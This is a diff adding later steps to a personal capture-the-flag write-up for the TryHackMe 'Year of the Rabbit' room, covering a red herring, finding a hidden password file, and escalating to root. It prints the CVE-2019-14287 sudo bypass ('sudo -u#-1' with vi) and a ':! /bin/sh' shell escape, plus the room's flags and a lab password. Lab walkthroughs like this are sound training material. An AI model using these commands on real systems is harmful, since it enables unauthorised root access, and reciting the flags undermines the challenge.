ChrisPritchard/ctf-writeups/tryhackme/yearoftherabbit.md

     END MESSAGE
     ```

 16. No `sudo -l`, nothing interesting in find -perm.
 Another home dir for `gwendoline` containing `user.txt`, but I couldn't read it.
-However, in eli's folder, there is a file called `core` that is quite interesting.
+However, in eli's folder, there is a file called `core` that looked quite interesting: strings revealed it contained css, html, lots of reference to gtk etc. Maybe some sort of X server I could mount?

+    > I spent a lot of time (like, several hours) messing about with `core`.
+But it was a red herring.
+I wasn't getting anywhere and so finally went for a hint.

+17. Ignoring `core`, the next step was actually something I had idly considered on first joining: in the message about, "s3cr3t: is an odd out-of-place spelling. `locate s3cr3t` revealed:

+    ```
+    /usr/games/s3cr3t
+    /usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!
+    /var/www/html/sup3r_s3cr3t_fl4g.php
+    ```

+18. Catting `/usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!` revealed:

+    ```
+    Your password is awful, Gwendoline.
+    It should be at least 60 characters long!
+Not just MniVCQVhQHUNI Honestly!

+    Yours sincerely
+    -Root
+    ```

+19. I ssh'd on with gwendoline using these creds and read the user flag: `THM{1107174691af9ff3681d2b5bdb5740b1589bae53}`

+20. `sudo -l` revealed:

+    ```
+    Matching Defaults entries for gwendoline on year-of-the-rabbit: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

+    User gwendoline may run the following commands on year-of-the-rabbit:
+        (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
+    ```

+    This looks suspiciously like `CVE-2019-14287`, which I dealt with in the room "agentsudoctf".

+21. Sure enough, `sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt` opened vim, and then `:! /bin/sh` got me a root shell.

+22. The final flag, at `/root/root.txt`, was `THM{8d6f163a87a1c80de27a4fd61aef0f3a0ecf9161}`.
+Finally!

+Overall, a very long and tough (but not too tough!) room.
+Glad its over, but had fun along the way.